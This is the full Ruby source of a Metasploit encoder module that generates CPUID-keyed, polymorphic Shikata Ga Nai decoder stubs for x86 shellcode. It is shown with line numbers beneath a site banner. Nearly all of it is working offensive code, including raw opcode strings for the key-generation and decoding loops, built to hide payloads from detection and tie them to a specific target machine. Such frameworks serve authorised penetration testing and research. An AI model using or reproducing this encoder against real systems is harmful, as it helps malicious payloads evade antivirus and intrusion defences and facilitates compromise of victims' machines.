Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/poly'
7

8
class MetasploitModule < Msf::Encoder::XorAdditiveFeedback
9

10
  # Manual ranking because the cpuid value is generated and supplied
11
  # manually...
12

13
  Rank = ManualRanking
14

15
  def initialize
16
    super(
17
      'Name'             => 'CPUID-based Context Keyed Payload Encoder',
18
      'Description'      => %q{
19
        This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
20
      },
21
      'Author'           => 'Dimitris Glynos',
22
      'Arch'             => ARCH_X86,
23
      'License'          => MSF_LICENSE,
24
      'Decoder'          =>
25
        {
26
          'KeySize'    => 4,
27
          'BlockSize'  => 4
28
        })
29

30
    register_options(
31
      [
32
        OptString.new('CPUID_KEY',
33
          [ true,
34
          "CPUID key from target host (see tools/context/cpuid-key utility)",
35
          "0x00000000"]),
36
      ])
37
  end
38

39
  def obtain_key(buf, badchars, state)
40
    state.key = datastore['CPUID_KEY'].hex
41
    return state.key
42
  end
43

44
  #
45
  # Generates the shikata decoder stub.
46
  #
47
  def decoder_stub(state)
48
    # If the decoder stub has not already been generated for this state, do
49
    # it now.  The decoder stub method may be called more than once.
50
    if (state.decoder_stub == nil)
51
      # Shikata will only cut off the last 1-4 bytes of it's own end
52
      # depending on the alignment of the original buffer
53
      cutoff = 4 - (state.buf.length & 3)
54
      block = keygen_stub() + generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)
55

56
      # Take the last 1-4 bytes of shikata and prepend them to the buffer
57
      # that is going to be encoded to make it align on a 4-byte boundary.
58
      state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf
59

60
      # Cache this decoder stub.  The reason we cache the decoder stub is
61
      # because we need to ensure that the same stub is returned every time
62
      # for a given encoder state.
63
      state.decoder_stub = block
64
    end
65

66
    state.decoder_stub
67
  end
68

69
protected
70
  def keygen_stub
71
    payload =
72
      "\x31\xf6" +     # xor %esi,%esi
73
      "\x31\xff" +     # xor %edi,%edi
74
      "\x89\xf8" +     # cpuid_loop: mov %edi,%eax
75
      "\x31\xc9" +     # xor %ecx,%ecx
76
      "\x0f\xa2" +     # cpuid
77
      "\x31\xc6" +     # xor %eax,%esi
78
      "\x39\xf0" +     # cmp %esi,%eax
79
      "\x75\x03" +     # jne not_first_time
80
      "\x8d\x78\x01" + # lea 0x1(%eax,1),%edi
81
      "\x31\xde" +     # not_first_time: xor %ebx,%esi
82
      "\x31\xce" +     # xor %ecx,%esi
83
      "\x31\xd6" +     # xor %edx,%esi
84
      "\x83\xef\x01" + # sub $0x1,%edi
85
      "\x75\xe6" +     # jne cpuid_loop
86
      "\x89\xf0"       # mov %esi,%eax
87
  end
88

89
  #
90
  # Returns the set of FPU instructions that can be used for the FPU block of
91
  # the decoder stub.
92
  #
93
  def fpu_instructions
94
    fpus = []
95

96
    0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
97
    0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
98
    0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
99
    0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
100
    0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }
101

102
    fpus << "\xd9\xd0"
103
    fpus << "\xd9\xe1"
104
    fpus << "\xd9\xf6"
105
    fpus << "\xd9\xf7"
106
    fpus << "\xd9\xe5"
107

108
    # This FPU instruction seems to fail consistently on Linux
109
    #fpus << "\xdb\xe1"
110

111
    fpus
112
  end
113

114
  #
115
  # Returns a polymorphic decoder stub that is capable of decoding a buffer
116
  # of the supplied length and encodes the last cutoff bytes of itself.
117
  #
118
  def generate_shikata_block(state, length, cutoff)
119
    # Declare logical registers
120
    key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
121
    count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
122
    addr_reg  = Rex::Poly::LogicalRegister::X86.new('addr')
123

124
    # Declare individual blocks
125
    endb = Rex::Poly::SymbolicBlock::End.new
126

127
    # FPU blocks
128
    fpu = Rex::Poly::LogicalBlock.new('fpu',
129
      *fpu_instructions)
130
    fnstenv = Rex::Poly::LogicalBlock.new('fnstenv', "\xd9\x74\x24\xf4")
131

132
    # Get EIP off the stack
133
    popeip = Rex::Poly::LogicalBlock.new('popeip',
134
      Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
135

136
    # Clear the counter register
137
    clear_register = Rex::Poly::LogicalBlock.new('clear_register',
138
      "\x31\xc9",
139
      "\x29\xc9",
140
      "\x33\xc9",
141
      "\x2b\xc9")
142

143
    # Initialize the counter after zeroing it
144
    init_counter = Rex::Poly::LogicalBlock.new('init_counter')
145

146
    # Divide the length by four but ensure that it aligns on a block size
147
    # boundary (4 byte).
148
    length += 4 + (4 - (length & 3)) & 3
149
    length /= 4
150

151
    if (length <= 255)
152
      init_counter.add_perm("\xb1" + [ length ].pack('C'))
153
    else
154
      init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
155
    end
156

157
    # Key initialization block
158

159
    # Decoder loop block
160
    loop_block = Rex::Poly::LogicalBlock.new('loop_block')
161

162
    xor  = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
163
    xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
164
    xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
165
    add  = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
166
    add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
167
    add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
168
    sub4 = Proc.new { |b| "\x83" + (0xe8 + b.regnum_of(addr_reg)).chr + "\xfc" }
169
    add4 = Proc.new { |b| "\x83" + (0xc0 + b.regnum_of(addr_reg)).chr + "\x04" }
170

171
    loop_block.add_perm(
172
      Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
173
      Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
174
      Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
175
      Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
176
      Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
177
      Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })
178

179
    # Loop instruction block
180
    loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
181
      "\xe2\xf5")
182

183
    # Define block dependencies
184
    fnstenv.depends_on(fpu)
185
    popeip.depends_on(fnstenv)
186
    init_counter.depends_on(clear_register)
187
    loop_block.depends_on(popeip, init_counter)
188
    loop_inst.depends_on(loop_block)
189

190
    # Generate a permutation saving the EAX, ECX and ESP registers
191
    loop_inst.generate([
192
      Rex::Arch::X86::EAX,
193
      Rex::Arch::X86::ESP,
194
      Rex::Arch::X86::ECX ], nil, state.badchars)
195
  end
196
end
197

198